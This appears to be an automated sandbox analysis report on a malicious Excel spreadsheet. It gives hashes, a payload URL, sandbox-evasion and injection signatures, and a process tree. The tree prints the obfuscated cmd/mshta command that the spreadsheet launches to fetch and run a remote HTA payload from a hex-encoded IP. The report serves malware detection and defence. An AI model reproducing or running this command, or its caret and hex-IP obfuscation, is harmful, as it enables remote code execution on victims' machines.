Analysis
-
max time kernel
133s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 21:43
Behavioral task
behavioral1
Sample
a2f0339900b1bf244f4c9c36e619b0317fde876cd6597b51a37ae9d3bd544f3d.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a2f0339900b1bf244f4c9c36e619b0317fde876cd6597b51a37ae9d3bd544f3d.xls
Resource
win10v2004-20241007-en
General
-
Target
a2f0339900b1bf244f4c9c36e619b0317fde876cd6597b51a37ae9d3bd544f3d.xls
-
Size
128KB
-
MD5
72d08e1daa18c52c17a0f5509f26b851
-
SHA1
28936bbd4c5043b3e271c5ef218256158e5f46d3
-
SHA256
a2f0339900b1bf244f4c9c36e619b0317fde876cd6597b51a37ae9d3bd544f3d
-
SHA512
09e5e26e588624e95805ea06efb1ac85295efab2ebea4ecd21ef1a8b9df1ad8b67f1c78389fa543dfcc87585e53467a0db19a9211b398a7890638dc50087f328
-
SSDEEP
3072:Wuk3hbdlylKsgqopeJBWhZFGkE+cL2NdAxEvN8B/W6X1yxYovrepMUdQ6gSz4i:Fk3hbdlylKsgqopeJBWhZFVE+W2NdAmv
Malware Config
Extracted
http://185.7.214.7/cc.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3976 1948 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 15 4340 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1948 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE 1948 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 1948 wrote to memory of 3976 1948 EXCEL.EXE cmd.exe PID 1948 wrote to memory of 3976 1948 EXCEL.EXE cmd.exe PID 3976 wrote to memory of 4340 3976 cmd.exe mshta.exe PID 3976 wrote to memory of 4340 3976 cmd.exe mshta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a2f0339900b1bf244f4c9c36e619b0317fde876cd6597b51a37ae9d3bd544f3d.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/cc.html3⤵
- Blocklisted process makes network request
PID:4340
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5e08047b8a60e0e8ec6ce8e287e30b03f
SHA15ff457fbfe61fe922f39fa6f9cdee8f15a6d6269
SHA2569d2c05a8949b654b798bcc8755f60197304adb73da028349fd018ad455ff89d6
SHA5121f433dcc09cde000aed8da06bacec61ae4c1f55a253662ba0076485631d96f7f2ee13c2ed5939b8cdb96d267463438660737ce19f2f13f7784f85e4bc144fe55